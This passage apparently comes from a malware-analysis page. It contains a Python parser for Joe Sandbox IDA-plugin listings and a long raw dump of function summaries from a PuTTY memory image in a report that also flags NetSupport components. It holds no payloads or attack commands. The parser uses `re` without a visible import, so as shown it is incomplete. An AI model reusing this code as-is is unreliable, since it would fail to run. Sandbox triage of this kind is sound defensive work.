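from dataclasses import dataclass, field

# Constructed sample: two function summaries copied (and trimmed) from the
# Joe Sandbox IDA-plugin listing on this page, so the parser runs offline.
SAMPLE = r"""
APIs
• _strlen.LIBCMT ref: 00449D96
• _strlen.LIBCMT ref: 00449DA0
  • Part of subcall function 00449B27: _strcat.LIBCMT ref: 00449B2C
• RegCreateKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\SshHostKeys,?), ref: 00449DD5
• _strlen.LIBCMT ref: 00449DE2
• RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001,?,?), ref: 00449DF5
• RegCloseKey.ADVAPI32(?,?,?,?,00412E1F,00000000), ref: 00449DFE
Strings
• Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 00449DCB
Memory Dump Source
• Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _strlen$CloseCreateValue_strcat
• String ID: Software\SimonTatham\PuTTY\SshHostKeys
• API String ID: 3776462603-1465603940
• Instruction Fuzzy Hash: FF017531400208BBDF116F91EC46EDF7B69EF04754F100476FD01650A2E7769E50AA98
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 0044895F
• OpenProcess.KERNEL32(02000000,00000000,00000000,?,?), ref: 0044896C
• GetLengthSid.ADVAPI32(00000000,?), ref: 004489D8
• CopySid.ADVAPI32(00000000,00000000,00000000,?), ref: 004489F0
• CloseHandle.KERNEL32(?,?), ref: 00448A02
Similarity
• API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
• String ID:
• Instruction Fuzzy Hash: 8C219371904204BFEB215FA5EC88EAFBBB9EB44741F10007AF505E11A1DF758E409B29
Uniqueness

Uniqueness Score: -1.00%
"""

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR" (no args captured)
CALL_RE = re.compile(r"^(?:•\s+)?(?P<name>[#\w]+)\.(?P<mod>\w+)"
                     r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
SUB_RE = re.compile(r"^•\s+Part of subcall function (?P<fn>[0-9A-Fa-f]{8}):\s*(?P<rest>.+)$")
STR_RE = re.compile(r"^•\s+(?P<s>.+?),\s*xrefs:\s*(?P<x>[0-9A-Fa-f]{8})")

MAXIMUM_ALLOWED = 0x02000000          # documented Windows access-mask bit
REG_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
             0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}

@dataclass
class Call:
    name: str
    module: str
    args: list   # raw stack slots as printed by the sandbox ("?" = unknown)
    ref: str     # address of the call instruction

@dataclass
class FunctionSummary:
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""
    calls: list = field(default_factory=list)
    subcalls: list = field(default_factory=list)   # (callee function addr, Call)
    strings: list = field(default_factory=list)    # (string, xref addr)

def _hex(s):
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", s or "") else None

def _call(text):
    m = CALL_RE.match(text)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") is not None else []
    return Call(m.group("name"), m.group("mod"), args, m.group("ref").upper())

def parse_report(text):
    """Split the plain-text listing into one FunctionSummary per 'Uniqueness Score' block."""
    records, cur, section = [], FunctionSummary(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in ("APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness"):
            section = line
            continue
        if line.startswith("Uniqueness Score:"):      # closes the current function block
            records.append(cur)
            cur, section = FunctionSummary(), None
            continue
        if section == "APIs":
            m = SUB_RE.match(line)
            if m:
                c = _call(m.group("rest"))
                if c:
                    cur.subcalls.append((m.group("fn").upper(), c))
                continue
            c = _call(line)
            if c:
                cur.calls.append(c)
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                cur.strings.append((m.group("s"), m.group("x").upper()))
        elif section == "Similarity":
            for key, attr in (("API ID:", "api_id"), ("String ID:", "string_id"),
                              ("Instruction Fuzzy Hash:", "fuzzy_hash")):
                if line.startswith("• " + key):
                    setattr(cur, attr, line[len("• " + key):].strip())
    return records

def triage(rec):
    """Human-readable notes for the calls an analyst would look at first."""
    notes = []
    for c in rec.calls:
        if c.name.startswith(("RegCreateKey", "RegOpenKey")) and len(c.args) >= 2:
            root = REG_ROOTS.get(_hex(c.args[0]), c.args[0])   # HKEY_* root handle value
            verb = "create" if "Create" in c.name else "open"
            notes.append(f"registry key {verb}: {root}\\{c.args[1]}")
        elif c.name.startswith("RegSetValueEx"):
            notes.append(f"registry value write at {c.ref}")
        elif c.name == "OpenProcess" and c.args:
            access = _hex(c.args[0])                             # dwDesiredAccess
            if access is not None:
                flag = " (MAXIMUM_ALLOWED)" if access & MAXIMUM_ALLOWED else ""
                notes.append(f"OpenProcess access=0x{access:08X}{flag}")
        elif c.name in ("CopySid", "GetLengthSid"):
            notes.append(f"SID handling via {c.name} at {c.ref}")
    return notes

if __name__ == "__main__":
    for i, rec in enumerate(parse_report(SAMPLE), 1):
        print(f"[{i}] API ID={rec.api_id!r} fuzzy={rec.fuzzy_hash[:16]}...")
        print("    calls:", " -> ".join(c.name for c in rec.calls))
        for n in triage(rec):
            print("    !", n)
```

Run against a whole exported report, the call sequences and Instruction Fuzzy Hash values give a quick way to confirm that the dumped 0x400000 image really is stock PuTTY (the host-key registry path and the "PuTTY-Release-0.63" version string are both visible in this listing) rather than a patched build, and to separate that noise from the NetSupport components the report flags elsewhere.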

                            APIs
                            • GetCPInfo.KERNEL32(00000000,?,00470B78,00000038,00450C18,?,00000000,00000000,004549BC,00000000,00000000,00470568,0000001C,00454704,00000001,00000020), ref: 00455871
                            • GetCPInfo.KERNEL32(00000000,00000001), ref: 00455884
                            • _strlen.LIBCMT ref: 004558A8
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,004549BC,?,00000000,00000000), ref: 004558C9
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Info$ByteCharMultiWide_strlen
                            • String ID:
                            • API String ID: 1335377746-0
                            • Opcode ID: 2feeb6e78121d374f651f3a157739a515128fc46d9516fb35b3557c73e0b06aa
                            • Instruction ID: 71a86f2062da7f953394e81b2cd737648b0bf870d99f78ad37902e1e1f948749
                            • Opcode Fuzzy Hash: 2feeb6e78121d374f651f3a157739a515128fc46d9516fb35b3557c73e0b06aa
                            • Instruction Fuzzy Hash: 00518DB0801608FFCF219F95EC949AFBBB9EF45361F24012BF814A2262D7384D55CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetEnvironmentStringsW.KERNEL32(75570A60,00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 00454007
                            • GetLastError.KERNEL32(?,?,?,?,0044F241,?,00470420,00000060), ref: 0045401B
                            • GetEnvironmentStringsW.KERNEL32(75570A60,00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 0045403D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,75570A60,00000000,?,?,?,?,0044F241), ref: 00454071
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 00454093
                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 004540AC
                            • GetEnvironmentStrings.KERNEL32(75570A60,00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 004540C2
                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004540FE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 883850110-0
                            • Opcode ID: 93010b070c63b1d57ce8f2842769bc667137740e7248b97a8ac06aacaa56abe9
                            • Instruction ID: f6088a2d8d5963394e630555d18e32c73cd40fffde5fe080852456406af31800
                            • Opcode Fuzzy Hash: 93010b070c63b1d57ce8f2842769bc667137740e7248b97a8ac06aacaa56abe9
                            • Instruction Fuzzy Hash: 8B3124725092156FD7306F65AC8483BBA9CEB84B5E735093BFF45CB283D6198CC88269
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(?,76C03E70,0000018A,?,00000000), ref: 00439FB6
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000189,?,00000000), ref: 00439FD0
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000199,?,00000000), ref: 00439FDC
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000185,00000000,?), ref: 00439FEC
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000182,?,00000000), ref: 00439FF8
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000181,?,?), ref: 0043A00A
                            • SendDlgItemMessageA.USER32(?,76C03E70,0000019A,?,?), ref: 0043A018
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000186,?,00000000), ref: 0043A024
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID:
                            • API String ID: 3015471070-0
                            • Opcode ID: dbe39e404d29aaa6535a4a6812e3e6d618de16cd94b4ea41ceb902533dab2ee5
                            • Instruction ID: 7a82d8a5288d6a49391567cde1b4821aff929d34edecc5ba30f049eb9610321f
                            • Opcode Fuzzy Hash: dbe39e404d29aaa6535a4a6812e3e6d618de16cd94b4ea41ceb902533dab2ee5
                            • Instruction Fuzzy Hash: 630184B1A843583AF52017238C4AF5B7EACDBC2FA4F10491EB345290C19DB6B501CAB9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: %s%02x$gvE$ssh-dss %d
                            • API String ID: 1497175149-1824579276
                            • Opcode ID: 57958e0a491d395dc3470ac22e0021c00f8749588cf01254fdd8e6cb20da97e4
                            • Instruction ID: 1b27a866da1aa94d4c286d17f70fb49bf2f68520a64b428f27900b89e72d9431
                            • Opcode Fuzzy Hash: 57958e0a491d395dc3470ac22e0021c00f8749588cf01254fdd8e6cb20da97e4
                            • Instruction Fuzzy Hash: F26107B2705248AADB21EFB59D82DDF379CAF14304F98052BFD10C7153EA69EA088365
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00439176: MapDialogRect.USER32(?,?), ref: 0043918A
                              • Part of subcall function 00439176: CreateWindowExA.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004391BA
                              • Part of subcall function 00439176: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 004391CA
                              • Part of subcall function 00439176: SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116), ref: 004391F2
                            • #13.COMCTL32(00000000), ref: 00439F7D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$CreateDialogMessageRectSend
                            • String ID: &Down$&Up$BUTTON$LISTBOX$STATIC
                            • API String ID: 4261271132-16109167
                            • Opcode ID: 423c8272584e084cc90ded58979e14bc5d2fb39d28c7552291c33a79eff041c7
                            • Instruction ID: bb746fb7df023947b67c4bc878b981e4313dee354563c314900e9b6a47100a7e
                            • Opcode Fuzzy Hash: 423c8272584e084cc90ded58979e14bc5d2fb39d28c7552291c33a79eff041c7
                            • Instruction Fuzzy Hash: D15128B1E0020A9BCF04DF59D981AAEBBB5FF49304F14805AFD04AB341D3B59A11CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strrchr.LIBCMT ref: 0040E272
                              • Part of subcall function 0040B625: _strlen.LIBCMT ref: 0040B632
                              • Part of subcall function 0040B625: _strcat.LIBCMT ref: 0040B644
                              • Part of subcall function 0040DEAE: _strlen.LIBCMT ref: 0040DEDA
                              • Part of subcall function 0040DEAE: _strlen.LIBCMT ref: 0040DF00
                              • Part of subcall function 0040DEAE: _strlen.LIBCMT ref: 0040DF34
                              • Part of subcall function 0040DEAE: _strspn.LIBCMT ref: 0040DF6B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat_strrchr_strspn
                            • String ID: (IPv4)$ (IPv6)$Looking up host "%s"%s$gvE$rlogin username:
                            • API String ID: 3670284386-2094088482
                            • Opcode ID: f1f5619a44e5408d4595728fcda53f522620a94b41ec8ea5780eb15f5d7c7d0a
                            • Instruction ID: 779e1a876b7480c84887323dabdab83e4560eacee05c3f2a3bf561fda1cb4fff
                            • Opcode Fuzzy Hash: f1f5619a44e5408d4595728fcda53f522620a94b41ec8ea5780eb15f5d7c7d0a
                            • Instruction Fuzzy Hash: 2951C271400305AFDB216F66CC4195F7BA9FF48308B10483FF949AA2A2D77AD861DB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000006), ref: 00440DD6
                            • InvalidateRect.USER32(00000000,00000001), ref: 00440EB2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: InvalidateRectWindow
                            • String ID: +P\G$+5T\G$+5d\G$hP\G
                            • API String ID: 874511656-558855892
                            • Opcode ID: 580a7489cf5d3c3cc992cf651d9a79678b82b2051ae4968822db0af603d86b5a
                            • Instruction ID: 428bb0ceab1bbb8f53c5b19dfb400cd53e5a72426813c1f703fe3ed0ca8fc011
                            • Opcode Fuzzy Hash: 580a7489cf5d3c3cc992cf651d9a79678b82b2051ae4968822db0af603d86b5a
                            • Instruction Fuzzy Hash: F56132B1E11605CFDB15CFB8ED89A997BB1FB48304B54457AE508EB261C770B891CF48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: %s%02x$gvE$ssh-rsa %d
                            • API String ID: 1497175149-1928246234
                            • Opcode ID: ac2ff0093cae833250305f51c748178b9d3d7eda7977db5a3f265f98debbcfd6
                            • Instruction ID: 7690cba06b481a5e2fa5d8840b5a7b491b196493169ec7a0acaa0455b709f80a
                            • Opcode Fuzzy Hash: ac2ff0093cae833250305f51c748178b9d3d7eda7977db5a3f265f98debbcfd6
                            • Instruction Fuzzy Hash: 65412AB2605258AADB10EBF59C81DDF379CAF14704F94052BFE11C7153EA69EA0883A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetStartupInfoA.KERNEL32(`Wu), ref: 00451860
                            • GetFileType.KERNEL32(00000800), ref: 00451907
                            • GetStdHandle.KERNEL32(-000000F6), ref: 00451960
                            • GetFileType.KERNEL32(00000000), ref: 0045196E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: FileType$HandleInfoStartup
                            • String ID: `Wu
                            • API String ID: 2290155327-3261129705
                            • Opcode ID: 5e328e64d1c0c6a0c2dfaecc35d142156f27a91f85ebccb24ec5bdb135c68217
                            • Instruction ID: df0ac8cfa3121b173d7f42fb5dda2e2a0d2f966fe28fb53f0ba6bdd74de61ad9
                            • Opcode Fuzzy Hash: 5e328e64d1c0c6a0c2dfaecc35d142156f27a91f85ebccb24ec5bdb135c68217
                            • Instruction Fuzzy Hash: 1B51D2B15082018FD7249B28DCA47663BA5EB11322F59477AD8A6CB3F3D72CD889C719
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0043D0E9: _wctomb_s.LIBCMT ref: 0043D14E
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D15B
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D166
                              • Part of subcall function 0043D0E9: _strcat.LIBCMT ref: 0043D18B
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 0044940B
                              • Part of subcall function 00449177: GetCommState.KERNEL32(?,?), ref: 00449188
                              • Part of subcall function 004457AD: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,75572EE0,?,?,00449070,?,00448E4B,00000000,00000000,?,00448E0F), ref: 004457DA
                              • Part of subcall function 004457AD: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00449070,?,00448E4B,00000000,00000000,?,00448E0F,00000000,00000000), ref: 004457E3
                              • Part of subcall function 004457AD: CreateThread.KERNEL32(00000000,00000000,004455AC,00000004,00000000,00000000), ref: 00445845
                              • Part of subcall function 00445710: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,75572EE0,?,?,0044905E,?,00448E0F,00000000,00000000), ref: 0044573B
                              • Part of subcall function 00445710: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0044905E,?,00448E0F,00000000,00000000), ref: 00445744
                              • Part of subcall function 00445710: CreateThread.KERNEL32(00000000,00000000,0044544C,00000004,00000000,00000000), ref: 00445799
                              • Part of subcall function 0040B625: _strlen.LIBCMT ref: 0040B632
                              • Part of subcall function 0040B625: _strcat.LIBCMT ref: 0040B644
                              • Part of subcall function 0043D83C: CreatePopupMenu.USER32 ref: 0043D877
                              • Part of subcall function 0043D83C: AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0043D922
                              • Part of subcall function 0043D83C: DeleteMenu.USER32(00474DCC,00000000,00000000,?,00000000,?,?,00000000,00000000,?), ref: 0043D968
                              • Part of subcall function 0043D83C: DeleteMenu.USER32(00474DCC,00000200,00000000,?,?,00000000,00000000,?), ref: 0043D977
                              • Part of subcall function 0043D83C: InsertMenuA.USER32(00000000,00000010,00000010,00000000,S&pecial Command), ref: 0043D991
                              • Part of subcall function 0043D83C: InsertMenuA.USER32(00000000,00000010,00000800,00000200,00000000), ref: 0043D9A7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Create$Menu$Event$ItemMessageSend_strlen$DeleteInsertThread_strcat$AppendCommFilePopupState_wctomb_s
                            • String ID: %s%s$Opening serial device %s$Unable to open serial port$\\.\$gvE
                            • API String ID: 3590176419-1544093267
                            • Opcode ID: 4d07e35b23eee39b93f09e2b2b6e39a9200f44e75f9a74cbf5cd76865a06feec
                            • Instruction ID: aa530ea22b0113684d0d069f6972fa9a56cd50bcc8efb47e68dacb0f4eb10717
                            • Opcode Fuzzy Hash: 4d07e35b23eee39b93f09e2b2b6e39a9200f44e75f9a74cbf5cd76865a06feec
                            • Instruction Fuzzy Hash: A221A7B0A00304BFEB206F26DC81E5B7BA8EF44758F10892FF959D6292D77999008B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: %s%s$..\settings.c$DE$gvE$p - buf == maxlen
                            • API String ID: 4218353326-3436020521
                            • Opcode ID: 7d6e2a2ab0a6c7bc02b5b1ba447ac2734af9e9655153d91af2b9807382ec40f1
                            • Instruction ID: 881d67b24fd9f9074f03dd4dd405d04955db658826ec4f7ac11528b5b5a2b07c
                            • Opcode Fuzzy Hash: 7d6e2a2ab0a6c7bc02b5b1ba447ac2734af9e9655153d91af2b9807382ec40f1
                            • Instruction Fuzzy Hash: 8C21B77290020ABBDF15AE96DC429AF762AEF40745F14047AFD00712C3EB799E2186AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentProcess.KERNEL32(00454B9B,0046FC80,?,?,0044EF4D,00000000,00000001,00000000,00454B9B,00000003), ref: 0044EE81
                            • TerminateProcess.KERNEL32(00000000,?,?,0044EF4D,00000000,00000001,00000000,00454B9B,00000003), ref: 0044EE88
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Process$CurrentTerminate
                            • String ID: 0G$(0G$,0G$00G
                            • API String ID: 2429186680-1713049428
                            • Opcode ID: 0452c378078a1788f2212de30715ae059edb04bf10118c0a68f3804feebe5709
                            • Instruction ID: 2eef184219eaf06013ddcb3e94726bdda1dd49d0dbf3c54232c33ad3a48acfe5
                            • Opcode Fuzzy Hash: 0452c378078a1788f2212de30715ae059edb04bf10118c0a68f3804feebe5709
                            • Instruction Fuzzy Hash: 44118B316052519BFB21DF6EEC4465A37A5FB41762B66443BE80AC7310D738DC80CBAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DeleteFileA.KERNEL32(?,0044A091,?,?,\PUTTY.RND), ref: 00449E16
                            • GetLastError.KERNEL32(\PUTTY.RND), ref: 00449E27
                            • GetLastError.KERNEL32 ref: 00449E2E
